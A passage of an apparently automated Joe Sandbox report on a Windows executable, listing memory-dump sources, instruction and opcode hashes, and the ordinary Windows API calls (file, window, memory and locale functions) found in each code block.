                                                                                • Instruction ID: 3d7a77417cef7b3885e8747e4544195f2de945da78ee84bb1155330bb8f828e3
                                                                                • Opcode Fuzzy Hash: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                • Instruction Fuzzy Hash: 0301F771300700AFD700FF69EC52E1B77EDDB46714710807AF500AB3D1D639AC10966A
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                • EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$CurrentEnumWindows
                                                                                • String ID:
                                                                                • API String ID: 2396873506-0
                                                                                • Opcode ID: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                • Instruction ID: bcaa23655132f8f2785c0a842f21b48ac99b37e3223c43442b01e3940dbd0cdf
                                                                                • Opcode Fuzzy Hash: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                • Instruction Fuzzy Hash: 31015B76A04604BFD706CF6BEC1199ABBE8E789720B22887BEC04D3690E7355C10DF18
                                                                                APIs
                                                                                • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CC2
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,00452CE8), ref: 00452CCA
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastMove
                                                                                • String ID:
                                                                                • API String ID: 55378915-0
                                                                                • Opcode ID: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                • Instruction ID: 1f9035ddd188b097fe3d15476f32cd7793c58c8f4df07880d9fc6ba60e4ff235
                                                                                • Opcode Fuzzy Hash: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                • Instruction Fuzzy Hash: 9401D671A04208AB8712EB799D4149EB7ECEB8A32575045BBFC04E3243EA785E048558
                                                                                APIs
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527A9
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527B1
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectoryErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1375471231-0
                                                                                • Opcode ID: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                • Instruction ID: e3b373b60118a844676bb749001e6832c3b26a50706decb61b3ae2e0e224b701
                                                                                • Opcode Fuzzy Hash: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                • Instruction Fuzzy Hash: 40F02871A00308BBCB01EF759D4259EB7E8EB4E311B2045B7FC04E3642E6B94E04859C
                                                                                APIs
                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 00423249
                                                                                • LoadCursorA.USER32(00000000,00000000), ref: 00423273
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CursorLoad
                                                                                • String ID:
                                                                                • API String ID: 3238433803-0
                                                                                • Opcode ID: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                • Instruction ID: 5e34cf6406f075c2c63d733b1f02ef4b9a88184ee1572dc0f3c8875cc615d59b
                                                                                • Opcode Fuzzy Hash: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                • Instruction Fuzzy Hash: 9EF0A711B04254AADA109E7E6CC0D6B72A8DF82735B61037BFA3EC72D1C62E1D414569
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLibraryLoadMode
                                                                                • String ID:
                                                                                • API String ID: 2987862817-0
                                                                                • Opcode ID: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                • Instruction ID: 14c2566281f292fbf4bc3f3871eddb8f7eb4f11f4d1149329263d7d1c8790498
                                                                                • Opcode Fuzzy Hash: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                • Instruction Fuzzy Hash: 02F08970B147447FDB119F779CA241BBBECDB49B1175249B6F800A3591E53C4910C928
                                                                                APIs
                                                                                • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 0045090E
                                                                                • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 00450916
                                                                                  • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$FilePointer
                                                                                • String ID:
                                                                                • API String ID: 1156039329-0
                                                                                • Opcode ID: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                • Instruction ID: 32d43412562f4d6ab64aa8be608e77008e370c57458e4df53f7444e76f76d0cb
                                                                                • Opcode Fuzzy Hash: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                • Instruction Fuzzy Hash: 0EE012E93042015BF700EA6599C1B2F22DCDB44315F00446ABD44CA28BE678CC048B29
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 2087232378-0
                                                                                • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                                                • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                                APIs
                                                                                • GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
                                                                                  • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E09
                                                                                  • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                • String ID:
                                                                                • API String ID: 1658689577-0
                                                                                • Opcode ID: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                • Instruction ID: 9026c6f0acc6bf601755118861b832b1e3c4c92574a9a05948c89544872af2a3
                                                                                • Opcode Fuzzy Hash: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                • Instruction Fuzzy Hash: 47314E35E00109ABCB00EB55CC819EEB779EF84314F558577E815BB286EB38AA018B98
                                                                                APIs
                                                                                • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC39
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: InfoScroll
                                                                                • String ID:
                                                                                • API String ID: 629608716-0
                                                                                • Opcode ID: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                • Instruction ID: 6365c2cd079840e4170b7c9ce409c3d873e807bce8729d2e10e5c00059922083
                                                                                • Opcode Fuzzy Hash: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                • Instruction Fuzzy Hash: D8214FB1608746AFC351DF3984407A6BBE4BB48344F14893EE498C3741E778E99ACBD6
                                                                                APIs
                                                                                  • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                  • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C4AE,?,00000000,?,?,0046C6C0,?,00000000,0046C734), ref: 0046C492
                                                                                  • Part of subcall function 0041EF58: IsWindow.USER32(?), ref: 0041EF66
                                                                                  • Part of subcall function 0041EF58: EnableWindow.USER32(?,00000001), ref: 0041EF75
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
                                                                                • String ID:
                                                                                • API String ID: 3319771486-0
                                                                                • Opcode ID: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                • Instruction ID: eef1953176fed27c4f60a3b97998f4e8fb1447464a393d6256780c84e8a913cd
                                                                                • Opcode Fuzzy Hash: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                • Instruction Fuzzy Hash: 5AF0B471248300BFE705DF62ECA6B35B6E8D748714F61047BF40886590E97D5844D51E
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                • Instruction ID: 51b66c86ab1fb2ed9abdb0db83839a26410808368eb32e0cb4295e2ee82716ff
                                                                                • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                • Instruction Fuzzy Hash: 09F04970608109EBBB1CCF58D0618AF7BA0EB48300F2080AFE907C7BA0D634AA80D658
                                                                                APIs
                                                                                • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416585
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                • Instruction ID: 158b8484bb218b41c698b3aa21f26e2dd86497bc01e640ef524e7c8f4c0ee3c6
                                                                                • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                • Instruction Fuzzy Hash: 4BF019B2200510AFDB84DE9CD9C0F9773ECEB0C210B0481A6FA08CB21AD220EC108BB0
                                                                                APIs
                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149EF
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CallbackDispatcherUser
                                                                                • String ID:
                                                                                • API String ID: 2492992576-0
                                                                                • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450804
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                                • Opcode Fuzzy Hash: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD14,?,00000001,?,?,00000000,?,0042CD66,00000000,00452A25,00000000,00452A46,?,00000000), ref: 0042CCF7
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                                • Instruction ID: d3c11148bbbe1678040d416a6bc301cfea82702c80b798926358c5e84281cc0e
                                                                                • Opcode Fuzzy Hash: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                                • Instruction Fuzzy Hash: 80E065B1304304BFD701EB66EC92A5EBAACDB49754BA14876B50097592D5B86E008468
                                                                                APIs
                                                                                • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: FormatMessage
                                                                                • String ID:
                                                                                • API String ID: 1306739567-0
                                                                                • Opcode ID: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                • Instruction ID: fbc307da5c1359fbfbc351051067b699ae1438aedf6613c80dda169529e76e7e
                                                                                • Opcode Fuzzy Hash: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                • Instruction Fuzzy Hash: BCE0206278431116F2353416AC47B77150E43C0708F944027BB90DF3D3D6AF9945D25E
                                                                                APIs
                                                                                • GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AF9B
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ExtentPointText
                                                                                • String ID:
                                                                                • API String ID: 566491939-0
                                                                                • Opcode ID: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                • Instruction ID: 6b43be1268843882f9474f888990ee0a0f71ddbfb678ee1088bae751a0726d8f
                                                                                • Opcode Fuzzy Hash: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                • Instruction Fuzzy Hash: E3E086F13097102BD600E67E1DC19DB77DC8A483697148177F458E7392D62DDE1A43AE
                                                                                APIs
                                                                                • CreateWindowExA.USER32(00000000,0042367C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00406311
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
